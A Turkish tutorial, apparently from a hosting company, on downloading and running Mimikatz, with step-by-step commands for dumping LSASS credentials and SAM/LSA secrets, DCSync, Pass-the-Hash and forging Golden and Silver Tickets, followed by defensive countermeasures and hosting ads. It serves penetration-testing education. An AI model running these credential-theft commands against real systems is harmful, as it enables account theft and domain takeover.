Mimikatz’ı Nasıl Kurulur ve Kullanılır: Güvenlik Uzmanları için Eksiksiz Bir Kılavuz

Mimikatz, siber güvenlik dünyasında en iyi bilinen ve en çok tartışılan araçlardan biridir. Başlangıçta Windows kimlik doğrulamasındaki güvenlik açıklarını göstermek amacıyla bir kavram kanıtı olarak geliştirilen bu araç, sızma testçilerinin, kırmızı takım uzmanlarının ve güvenlik araştırmacılarının araç setinde vazgeçilmez bir enstrüman haline gelmiştir. Bu kılavuz, Mimikatz’ın ne olduğunu, kimler tarafından kullanıldığını ve kontrollü bir ortamda nasıl sorumlu bir şekilde kurulup çalıştırılacağını kapsamlı biçimde ele almaktadır.

> Yasal Sorumluluk Reddi: Mimikatz yalnızca sahip olduğunuz veya test etmek için açık yazılı yetki aldığınız sistemlerde kullanılmalıdır. Yetkisiz kullanım yasadışıdır ve ciddi cezai yaptırımlara yol açabilir. Bu kılavuz yalnızca eğitim amaçlı ve meşru güvenlik testleri için hazırlanmıştır.

—

Mimikatz Nedir?

Mimikatz, Fransız güvenlik araştırmacısı Benjamin Delpy tarafından oluşturulan açık kaynaklı bir Windows güvenlik aracıdır. Temel işlevi, düz metin parolalar, NTLM parola hash’leri, PIN kodları ve Kerberos biletleri dahil olmak üzere kimlik doğrulama kimlik bilgilerini doğrudan bir Windows sisteminin belleğinden (özellikle LSASS sürecinden) çıkarmaktır.

Windows, hizmetler arasında kesintisiz kimlik doğrulamayı desteklemek amacıyla tarihsel olarak kimlik bilgilerini bellekte önbelleğe aldığından, Mimikatz işletim sisteminin hassas kimlik doğrulama verilerini nasıl işlediğine dair temel bir tasarım zafiyetini ortaya çıkarabildi. Microsoft o tarihten bu yana Credential Guard ve Protected Users güvenlik grubu gibi azaltıcı önlemler sunmuş olsa da Mimikatz bu savunmalarla birlikte gelişmeye devam etmekte ve mevcut tehdit ortamını anlamak için paha biçilmez bir referans aracı olmayı sürdürmektedir.

Mimikatz’ın Temel Yetenekleri

• Windows belleğinden (LSASS) düz metin parola çıkarma
• SAM veritabanından ve Active Directory’den NTLM hash dökümü
• Kerberos bileti çıkarma ve manipülasyonu (Golden Ticket, Silver Ticket saldırıları)
• Ele geçirilen hash’leri kullanarak Pass-the-Hash (PtH) kimlik doğrulaması
• Çalınan Kerberos biletlerini kullanan Pass-the-Ticket (PtT) saldırıları
• Doğrudan erişim olmadan etki alanı denetleyicisi verilerini çoğaltmak için DCSync saldırıları

—

Mimikatz’ı Kim Kullanır ve Neden?

Meşru Güvenlik Kullanım Senaryoları

Mimikatz, öncelikle bilgi güvenliği uzmanları tarafından aşağıdaki bağlamlarda kullanılmaktadır:

• Sızma testi — İlk erişim sağlamış bir saldırgana karşı bir kuruluşun savunmalarının ne kadar dayanıklı olduğunu değerlendirmek için gerçek dünya kimlik bilgisi hırsızlığı saldırılarını simüle etme.
• Kırmızı takım operasyonları — Mavi takımların ve SOC analistlerinin tespit ve müdahale yeteneklerini test etmek amacıyla gelişmiş kalıcı tehdit (APT) tekniklerini taklit etme.
• Güvenlik denetimleri — Parolaların ve Kerberos biletlerinin güvenlik en iyi uygulamalarına uygun şekilde depolanıp depolanmadığını ve korunup korunmadığını değerlendirme.
• Eğitim ve farkındalık — Sistem yöneticilerine ve mühendislere kimlik bilgisi tabanlı saldırıların pratikte tam olarak nasıl çalıştığını göstererek soyut tehditleri somut ve uygulanabilir hale getirme.
• Güvenlik açığı araştırması — Kötü niyetli aktörler bunları istismar etmeden önce Windows kimlik doğrulama mekanizmalarındaki yeni zayıflıkları tespit etme.

Kötü Amaçlı Kullanım

Ne yazık ki Mimikatz, etkinliği nedeniyle tehdit aktörleri arasında da favori bir araçtır. Yaygın kötü amaçlı kullanım senaryoları şunlardır:

• Pass-the-Hash saldırıları — Orijinal düz metin parolayı hiç bilmeden ele geçirilen NTLM hash’lerini kullanarak sistemlerde kimlik doğrulama.
• Pass-the-Ticket saldırıları — Bir ağ üzerinde meşru kullanıcıların kimliğine bürünmek için çalınan Kerberos biletlerini kullanma.
• İstismar sonrası kalıcılık — Bir ağda yanal olarak hareket etmek ve ayrıcalıkları yükseltmek için ilk ihlalden sonra kimlik bilgilerini toplama.
• Golden Ticket saldırıları — Etki alanı kaynaklarına kalıcı ve neredeyse sınırsız erişim elde etmek için Kerberos Ticket Granting Ticket’larını (TGT) sahte olarak oluşturma.

Saldırganların Mimikatz’ı nasıl kullandığını anlamak, savunucuların bu araçla neden tanışık olması gerektiğinin tam da nedenidir. Bir VPS Hosting ortamı işletiyorsanız veya özel altyapı yönetiyorsanız, bu saldırı vektörlerini bilmek daha dayanıklı savunmalar oluşturmanıza yardımcı olur.

—

Ön Koşullar

Yetkili test ortamınızda devam etmeden önce aşağıdaki koşulların karşılandığından emin olun:

> En İyi Uygulama: Mimikatz testlerini her zaman izole bir sanal makine veya özel bir laboratuvar sunucusu içinde gerçekleştirin. Sızma testi laboratuvarları için güvenli ve izole bir ortama ihtiyaç duyuyorsanız, testlerinizi üretim altyapısından tamamen ayrı tutmak amacıyla Windows görüntüsüyle bir VPS Hosting örneği dağıtmayı düşünün.

—

Adım 1: Mimikatz’ı İndirin

1.1 Resmi GitHub Deposunu Ziyaret Edin

Mimikatz, açık kaynaklı bir proje olarak sürdürülmektedir. Değiştirilmiş veya truva atı yerleştirilmiş sürümlerden kaçınmak için her zaman resmi kaynaktan indirin:

Resmi Depo: https://github.com/gentilkiwi/mimikatz

1.2 En Son Sürümü İndirin

1. Deponun Releases bölümüne gidin (sağ kenar çubuğu veya /releases URL yolu aracılığıyla).
2. En son kararlı sürümü bulun.
3. Önceden derlenmiş arşivi indirin — genellikle mimikatz_trunk.zip olarak adlandırılır.

1.3 Arşivi Çıkarın

1. İndirilen ZIP dosyasına sağ tıklayın.
2. Tümünü Çıkar… seçeneğini seçin.
3. Bir hedef dizin seçin, örneğin: C:SecurityToolsMimikatz

Çıkarma işleminin ardından iki alt dizin bulacaksınız:

• x64 — 64-bit ikili dosyalar (modern sistemlerde bunu kullanın)
• Win32 — 32-bit ikili dosyalar (eski sistemler için)

Çalışacağınız birincil yürütülebilir dosya mimikatz.exe‘dir.

—

Adım 2: Mimikatz’ı Çalıştırın

2.1 Yükseltilmiş Komut İstemi Açın

Mimikatz, korumalı bellek bölgeleriyle etkileşim kurmak için yönetici ayrıcalıkları gerektirir. Yükseltilmiş bir kabuk başlatmak için:

1. Windows + X tuşlarına basın
2. Komut İstemi (Yönetici) veya Windows PowerShell (Yönetici) seçeneğini seçin
3. UAC isteminde Evet‘e tıklayın

2.2 Mimikatz Dizinine Gidin

cd C:SecurityToolsMimikatzx64

mimikatz.exe‘ın bu dizinde mevcut olduğunu doğrulayın:
dir mimikatz.exe
2.3 Mimikatz’ı Başlatın
mimikatz.exe
Araç başarıyla başlarsa Mimikatz başlığını ve etkileşimli istemi göreceksiniz:
  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #
mimikatz # istemi, aracın çalıştığını ve komutları kabul etmeye hazır olduğunu doğrular.
2.4 Hata Ayıklama Ayrıcalıklarını Etkinleştirin
Çoğu kimlik bilgisi çıkarma komutunu çalıştırmadan önce, oturum içinde Mimikatz’ın kendi ayrıcalıklarını yükseltin:
mimikatz # privilege::debug
Beklenen çıktı:
Privilege '20' OK
Bu, Mimikatz’a LSASS gibi korumalı süreçlerin belleğini okumak için gerekli olan SeDebugPrivilege hakkını verir.
—
Adım 3: Temel Mimikatz Komutları
3.1 Bellekten Düz Metin Parolaları Çıkarın
Bu, Mimikatz’ın en iyi bilinen yeteneğidir. WDigest kimlik doğrulama sağlayıcısı tarafından önbelleğe alınan kimlik bilgilerini doğrudan LSASS belleğinden okur:
mimikatz # sekurlsa::logonpasswords
Döndürdükleri:

Oturum açmış kullanıcı adları
Etki alanı adları
Düz metin parolalar (WDigest önbelleğe alma etkinse)
NTLM hash’leri
SHA1 hash’leri
Kerberos kimlik bilgileri

> Not: Windows 8.1 ve sonrasında Microsoft, WDigest düz metin önbelleğe almayı varsayılan olarak devre dışı bırakmıştır. Ancak saldırganlar (ve testçiler) bunu bir kayıt defteri anahtarı aracılığıyla yeniden etkinleştirebilir; bu nedenle konu, ilgili bir test senaryosu olmaya devam etmektedir.
3.2 Depolanan Parolaları Görüntüleyin (Alternatif Komut)
mimikatz # sekurlsa::passwords
Bu komut, sistem belleğinde mevcut kimlik bilgilerinin basitleştirilmiş bir görünümünü sağlar.
3.3 Bellek Döküm Dosyasından Kimlik Bilgilerini Çıkarın
Mimikatz’ı doğrudan hedef sistemde çalıştıramazsanız, önce bir LSASS bellek dökümü alabilir ve ardından çevrimdışı olarak analiz edebilirsiniz:
Görev Yöneticisi’ni kullanarak döküm oluşturun:

Görev Yöneticisi’ni açın → Ayrıntılar sekmesi
lsass.exe‘ye sağ tıklayın → Döküm dosyası oluştur

Veya ProcDump‘ı (Sysinternals’tan) kullanın:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Dökümü Mimikatz ile analiz edin:
mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords
3.4 Kerberos Biletlerini Listeleyin
Mevcut oturum açma oturumundaki tüm Kerberos biletlerini listelemek için:
mimikatz # kerberos::list
Oturum anahtarları dahil tam ayrıntılarla biletleri listelemek için:
mimikatz # kerberos::list /export
Bu, her bileti Pass-the-Ticket saldırılarında kullanılabilecek bir .kirbi dosyası olarak dışa aktarır.
3.5 Kimlik Bilgilerini Bir Dosyaya Aktarın
Kimlik bilgisi dökümünün çıktısını daha sonra analiz etmek üzere bir metin dosyasına kaydetmek için:
mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt
Çıktı, belirtilen yoldaki credentials.txt‘a yazılacaktır.
—
Adım 4: Gelişmiş Mimikatz Teknikleri
4.1 Pass-the-Hash (PtH) Saldırısı
Pass-the-Hash, düz metin parolaya ihtiyaç duymadan ele geçirilen bir NTLM hash’i kullanarak uzak bir sistemde kimlik doğrulamasına olanak tanır:
mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe
Bu, hash kullanılarak belirtilen kullanıcı olarak kimlik doğrulanmış yeni bir cmd.exe süreci başlatır.
4.2 Golden Ticket Saldırısı
Golden Ticket, KRBTGT hesabının parola hash’iyle imzalanmış sahte bir Kerberos TGT’dir ve sahibine etki alanı kaynaklarına neredeyse sınırsız erişim sağlar. Bu, DCSync aracılığıyla elde edilebilen KRBTGT hash’ini gerektirir:
Adım 1 — KRBTGT hash’ini çıkarmak için DCSync:
mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt
Adım 2 — Golden Ticket oluşturun:
mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi
Adım 3 — Bileti enjekte edin:
mimikatz # kerberos::ptt golden.kirbi
4.3 SAM Veritabanından NTLM Hash’lerini Dökün
SAM veritabanından yerel hesap hash’lerini çıkarmak için (SYSTEM ayrıcalıkları gerektirir):
mimikatz # lsadump::sam
4.4 LSA’dan Sırları Dökün
mimikatz # lsadump::secrets
Bu, Yerel Güvenlik Yetkilisi tarafından depolanan hizmet hesabı kimlik bilgileri, önbelleğe alınmış etki alanı kimlik bilgileri ve diğer hassas verileri içerebilen LSA sırlarını alır.
4.5 Silver Ticket Saldırısı
Silver Ticket, tüm etki alanı yerine belirli bir hizmeti hedef alır. Hedef hizmet hesabının NTLM hash’ini gerektirir:
mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi
—
Adım 5: Savunma Karşı Önlemleri
Mimikatz’ın nasıl çalıştığını anlamak denklemin yalnızca yarısıdır. Diğer yarısı ise buna karşı nasıl savunma yapılacağını bilmektir. Dedicated Servers üzerinde veya bulut tabanlı altyapıda Windows sunucuları yönetiyorsanız, aşağıdaki azaltıcı önlemler kritik öneme sahiptir:
5.1 Credential Guard’ı Etkinleştirin
Windows Credential Guard, Mimikatz’ın kimlik bilgilerini doğrudan bellekten okumasını engellemek amacıyla LSASS’ı korumalı bir kapsayıcıda izole etmek için sanallaştırma tabanlı güvenlik (VBS) kullanır.
Grup İlkesi aracılığıyla etkinleştirin:
Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 WDigest Kimlik Doğrulamasını Devre Dışı Bırakın

WDigest’i devre dışı bırakarak düz metin parola önbelleğe almayı önleyin:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Kullanıcıları Protected Users Grubuna Ekleyin

Protected Users güvenlik grubunun üyeleri NTLM, DES veya RC4 Kerberos şifrelemesi kullanarak kimlik doğrulaması yapamaz; bu da kimlik bilgisi hırsızlığı saldırılarının etkinliğini önemli ölçüde sınırlar.

5.4 LSA Korumasını Uygulayın (RunAsPPL)

Yetkisiz bellek erişimini önlemek için LSASS için Protected Process Light (PPL) özelliğini etkinleştirin:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Mimikatz Göstergelerini İzleyin

SIEM veya EDR çözümünüzü aşağıdaki durumlarda uyarı verecek şekilde yapılandırın:

• Beklenmedik süreçlerden lsass.exe belleğine erişim
• Sistem dışı süreçlere verilen SeDebugPrivilege
• Süreç günlüklerinde şüpheli sekurlsa, kerberos veya lsadump komut kalıpları
• Olağandışı LSASS döküm dosyası oluşturma olayları (Olay Kimliği 4656, 4663)

5.6 Sistemleri Güncel Tutun

Birçok Mimikatz tekniği, bilinen güvenlik açıklarından veya eski davranışlardan yararlanır. Windows ve Active Directory’yi tam olarak yamalı tutmak, saldırı vektörlerinin tüm sınıflarını ortadan kaldırır.

—

Güvenli Hosting Altyapısı Bağlamında Mimikatz

Web uygulamaları, API’ler veya dahili hizmetler işleten kuruluşlar için kimlik bilgisi hırsızlığı riski yerel iş istasyonunun ötesine geçmektedir. Bir saldırgan sunucu ortamınıza erişim sağlarsa, Mimikatz gibi araçlar ayrıcalıkları yükseltmek ve ağ içinde yanal olarak hareket etmek için kullanılabilir.

Altyapı düzeyinde güvenliği ön planda tutan bir hosting sağlayıcısı seçmek, önemli bir savunma katmanıdır. Küçük projeler için Shared Web Hosting‘e veya kurumsal iş yükleri için Dedicated Servers‘a ihtiyaç duyuyor olun, hosting ortamınızın DDoS koruması, ağ izolasyonu ve düzenli güvenlik güncellemeleri içermesini sağlamak genel saldırı yüzeyinizi azaltır.

Active Directory ortamlarını veya Windows tabanlı uygulamaları yöneten ekipler için altyapınızı düzgün yapılandırılmış SSL Certificates ile eşleştirmek, istemciler ve sunucular arasında iletilen kimlik bilgilerinin aktarım sırasında şifrelenmesini sağlar; bu da ele geçirmeye karşı başka bir koruma katmanı ekler.

—

Özet: Mimikatz Komut Referansı

—

Sonuç

Mimikatz, siber güvenlik uzmanlarına sunulan en güçlü ve öğretici araçlardan biri olmaya devam etmektedir. Windows kimlik doğrulama mekanizmalarındaki temel zayıflıkları ortaya koyma yeteneği, Microsoft’un Credential Guard’dan Protected Users’a, LSA PPL’ye kadar kimlik bilgisi korumasını nasıl tasarladığı konusunda önemli iyileştirmelere yol açmıştır. Sızma testçileri, kırmızı takım uzmanları ve güvenlik araştırmacıları için Mimikatz hakkında kapsamlı bir anlayışa sahip olmak isteğe bağlı değil; zorunludur.

Her zaman akılda tutulması gereken temel ilkeler:

• Herhangi bir sistemde Mimikatz kullanmadan önce her zaman açık yazılı yetki alın.
• Kazara maruz kalmayı önlemek için izole ortamlar kullanın — sanal makineler veya özel laboratuvar sunucuları.
• Savunmaları, saldırıları anladığınız kadar derinlemesine anlayın.
• Güncel kalın — hem Mimikatz hem de Windows savunmaları sürekli olarak gelişmektedir.

Mimikatz gibi araçlar hakkındaki uygulamalı bilgiyi güvenli ve iyi yapılandırılmış bir hosting altyapısıyla birleştirerek, güvenlik ekipleri teorik varsayımlar yerine gerçek dünya saldırı tekniklerine karşı gerçek anlamda test edilmiş savunmalar oluşturabilir.

—

*AlexHost, güvenlik bilincine sahip profesyoneller göz önünde bulundurularak tasarlanmış güvenli, yüksek performanslı hosting çözümleri sunmaktadır. Bir sonraki güvenli laboratuvarınızı veya üretim ortamınızı oluşturmak için VPS Hosting planlarımızı ve Dedicated Servers seçeneklerimizi inceleyin.*